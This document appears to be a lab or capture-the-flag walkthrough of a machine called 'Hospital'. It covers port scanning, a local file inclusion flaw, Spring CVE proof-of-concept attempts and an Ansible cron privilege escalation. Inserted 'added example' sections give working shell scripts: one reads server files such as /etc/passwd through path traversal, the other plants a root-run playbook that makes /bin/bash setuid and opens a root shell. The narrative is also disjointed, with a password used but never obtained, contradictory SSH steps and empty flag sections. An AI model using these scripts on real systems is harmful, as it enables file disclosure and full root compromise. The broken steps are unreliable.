Hospital

Recon

nmap_scan.log
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
With RustScan, I scan ports so fast, even my firewall gets whiplash 💨

[~] The config file is expected to be at "/home/rustscan/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.129.228.213:22
Open 10.129.228.213:8080
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -vvv -sV -sC -Pn" on ip 10.129.228.213
Depending on the complexity of the script, results may take some time to appear.
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2024-11-24 19:58 UTC
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:58
Completed NSE at 19:58, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:58
Completed NSE at 19:58, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:58
Completed NSE at 19:58, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 19:58
Completed Parallel DNS resolution of 1 host. at 19:58, 0.11s elapsed
DNS resolution of 1 IPs took 0.11s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 19:58
Scanning 10.129.228.213 [2 ports]
Discovered open port 8080/tcp on 10.129.228.213
Discovered open port 22/tcp on 10.129.228.213
Completed Connect Scan at 19:58, 0.07s elapsed (2 total ports)
Initiating Service scan at 19:58
Scanning 2 services on 10.129.228.213
Completed Service scan at 19:58, 7.30s elapsed (2 services on 1 host)
NSE: Script scanning 10.129.228.213.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:58
Completed NSE at 19:59, 2.51s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:59
Completed NSE at 19:59, 0.33s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:59
Completed NSE at 19:59, 0.00s elapsed
Nmap scan report for 10.129.228.213
Host is up, received user-set (0.071s latency).
Scanned at 2024-11-24 19:58:52 UTC for 10s

PORT     STATE SERVICE     REASON  VERSION
22/tcp   open  ssh         syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 ca:f1:0c:51:5a:59:62:77:f0:a8:0c:5c:7c:8d:da:f8 (RSA)
| ssh-rsa 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
|   256 d5:1c:81:c9:7b:07:6b:1c:c1:b4:29:25:4b:52:21:9f (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIUJSpBOORoHb6HHQkePUztvh85c2F5k5zMDp+hjFhD8VRC2uKJni1FLYkxVPc/yY3Km7Sg1GzTyoGUxvy+EIsg=
|   256 db:1d:8c:eb:94:72:b0:d3:ed:44:b9:6c:93:a7:f9:1d (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICZzUvDL0INOklR7AH+iFw+uX+nkJtcw7V+1AsMO9P7p
8080/tcp open  nagios-nsca syn-ack Nagios NSCA
|_http-title: Home
| http-methods: 
|_  Supported Methods: GET HEAD OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:59
Completed NSE at 19:59, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:59
Completed NSE at 19:59, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:59
Completed NSE at 19:59, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.80 seconds

HTTP (8080)

Nmap's version probe labels port 8080 as nagios-nsca, but the http-title (Home) and http-methods results in the scan above show that it is an ordinary HTTP server.

Two users are listed on /blog: admin and Brandon Auger, but none of the posts are readable.

http://10.129.228.213:8080/upload accepts only images. Upload a valid one and you are redirected to http://10.129.228.213:8080/show_image?img=kraken.png

The img parameter of /show_image is vulnerable to LFI: it reads arbitrary files from the server.

Oddly, the same endpoint also returns a directory listing when the path points at a directory, so the filesystem can be browsed through it.

Reading /etc/passwd through the LFI enumerates the local users, and the web app appears to run as frank, since files in frank's home directory are readable.
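As an added example (not code from the original writeup), the following shell helpers build a traversal payload for the img parameter, fetch /etc/passwd through it and list the accounts that have a real login shell, which are the homes worth browsing next. The `../` traversal form, the depth of six and the endpoint layout are assumptions drawn from the redirect URL above; the page only shows that the parameter reads arbitrary files.

```shell
#!/bin/sh
# Added example, not part of the original writeup. TARGET defaults to the
# box's address from the scan; the "../" traversal form and the depth are
# assumptions, adjust them if the application normalises the path.
TARGET="${TARGET:-http://10.129.228.213:8080}"

# Build a traversal payload: <depth> copies of "../" followed by the
# absolute path with its leading slash removed.
lfi_payload() {
  depth="$1"; path="$2"; p=""; i=0
  while [ "$i" -lt "$depth" ]; do p="${p}../"; i=$((i+1)); done
  printf '%s%s' "$p" "${path#/}"
}

# Fetch one file (or directory listing) through the LFI and print the body.
# The payload is sent raw; percent-encoding the slashes is not needed here.
lfi_read() {
  curl -s "$TARGET/show_image?img=$(lfi_payload 6 "$1")"
}

# From passwd content on stdin, print "user:home" for accounts whose shell
# is not nologin/false. These are the users whose home directories may
# hold readable config files, keys or credentials.
users_with_shell() {
  awk -F: '$1 != "" && $7 !~ /(nologin|false)$/ { print $1 ":" $6 }'
}

# Sanity check that a response really is /etc/passwd and not an error
# page: the root entry must be present.
looks_like_passwd() {
  grep -q '^root:x:0:0:'
}

# Run against the target only when invoked as "sh lfi.sh run".
if [ "${1:-}" = "run" ]; then
  body=$(lfi_read /etc/passwd)
  if printf '%s\n' "$body" | looks_like_passwd; then
    printf '%s\n' "$body" | users_with_shell
  else
    echo "traversal did not return /etc/passwd; try another depth or encoding" >&2
    exit 1
  fi
fi
```

Once a user list is in hand, `lfi_read /home/frank/` uses the directory-listing behaviour described above to see what that home contains before guessing file names.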

The password does not work over SSH.

CVE-2022-22965 (Spring4Shell): the Docker PoC for CVE-2022-22965 with Spring Boot version 2.6.5 does not work here.

CVE-2022-22963 (Spring Cloud Function SpEL injection): the CVE-2022-22963-PoC works.

Password authentication fails over SSH, yet the same password works locally from the shell on the box, which suggests that password logins are disabled in sshd.

SSH

Upgrading the foothold to an SSH session still does not work for that user, so check the SSH daemon configuration (/etc/ssh/sshd_config):

Only the phil user is denied SSH access. So SSH in as frank and elevate to phil from there.

User.txt

Privilege Escalation

There is an Ansible cron job that apparently runs these playbooks and then deletes them.

https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/ansible-playbook-privilege-escalation/

After about 10 seconds the cron job has picked up and run the playbook:
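As an added example (not the writeup's own steps), this is the technique the linked page describes, in the form that fits this box: write a playbook into the directory that the cron job sweeps, wait for the task it runs as root to take effect, then use the result. The directory is not named above, so PLAYBOOK_DIR must be supplied; the setuid-bash task is one common choice of payload.

```shell
#!/bin/sh
# Added example, not from the original writeup. PLAYBOOK_DIR is an
# assumption: set it to the directory the Ansible cron job reads from.

# Write a minimal playbook with one shell task. Whoever runs
# ansible-playbook (root, if the cron job is root's) executes the task.
# Keep the command free of YAML-significant characters such as ": ".
write_playbook() {
  dir="$1"; cmd="$2"
  cat > "$dir/pe.yml" <<EOF
- hosts: localhost
  connection: local
  gather_facts: false
  tasks:
    - name: privilege escalation task
      shell: $cmd
EOF
  printf '%s\n' "$dir/pe.yml"
}

# Poll until <file> carries the setuid bit or <timeout> seconds pass.
# The cron job deletes the playbook after running it, so the only
# evidence that it ran is the side effect.
wait_for_suid() {
  file="$1"; timeout="${2:-60}"; waited=0
  while [ "$waited" -lt "$timeout" ]; do
    [ -u "$file" ] && return 0
    sleep 1; waited=$((waited+1))
  done
  return 1
}

# Run only when invoked as "PLAYBOOK_DIR=... sh ansible_pe.sh run".
if [ "${1:-}" = "run" ]; then
  dir="${PLAYBOOK_DIR:?set to the directory the cron job picks playbooks up from}"
  write_playbook "$dir" "chmod u+s /bin/bash"
  if wait_for_suid /bin/bash 60; then
    exec /bin/bash -p   # -p keeps the effective uid 0 granted by the setuid bit
  else
    echo "playbook was not executed within 60s" >&2
    exit 1
  fi
fi
```

If the cron job runs with a different user than expected, `ls -l /bin/bash` after the wait tells you whether the task actually ran as root; a playbook that only appends an SSH key to /root/.ssh/authorized_keys is the quieter alternative on an engagement where a setuid shell is undesirable.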

Root.txt
